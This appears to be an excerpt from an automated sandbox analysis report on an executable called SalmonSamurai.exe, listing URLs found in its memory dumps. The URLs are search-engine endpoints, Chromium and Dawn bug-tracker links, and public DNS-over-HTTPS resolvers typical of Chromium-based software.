Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://co.search.yahoo.com/favicon.icohttps://co.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://co.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://co.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://coccoc.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://coccoc.com/favicon.icohttps://coccoc.com/search#query=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://coccoc.com/search#query=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/1161355
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/1214923
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/1237175
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/1313172
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/1338622.
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1016
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1071
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1083
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1203
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1216
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1264
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1276
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1289
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1302
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1305
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/136
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1389
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1393
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/145
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1462
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1473
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1487
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/155
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1563
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1564
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1579
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/193
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/237
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/27
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/271
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/286
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/342
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/343
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/36
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/402
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/42
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/434
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/480
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/537
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/549
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/56
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/582
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/633
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/666
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/667
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/673
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/727
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/776
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/792
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/838
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/840
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/949
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/960
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/966
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/new
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/newCheckIfAudioThreadIsAliveMedia.AudioThreadStatusCreating
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/tint.
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/tint/1003
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dawn.googlesource.com/dawn/
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://de.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://de.search.yahoo.com/favicon.icohttps://de.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://de.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://de.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/Cloudflare
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://developers.google.com/speed/public-dns/privacy
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://developers.google.com/speed/public-dns/privacyGoogle
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dk.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dk.search.yahoo.com/favicon.icohttps://dk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dl.gmx.com/apps/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dl.gmx.com/apps/favicon.icohttps://search.gmx.com/web/result?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.google/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.quad9.net/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.quad9.net/dns-querydns.quad9.netdns9.quad9.net9.9.9.9149.112.112.1122620:fe::fe2620:fe::
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.sb/privacy/
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.sb/privacy/DNS.SBhttps://doh.dns.sb/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns10.quad9.net/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns10.quad9.net/dns-querydns10.quad9.net9.9.9.10149.112.112.102620:fe::102620:fe::fe:10;
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns11.quad9.net/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns11.quad9.net/dns-querydns11.quad9.net9.9.9.11149.112.112.112620:fe::112620:fe::fe:11
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns64.dns.google/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dnsnl.alekberg.net/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh-01.spectrum.com/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh-02.spectrum.com/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/adult-filter
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/family-filter
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/security-filter
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cox.net/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cox.net/dns-querydot.cox.net68.105.28.1168.105.28.122001:578:3f::30Z
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.dns.sb/dns-query
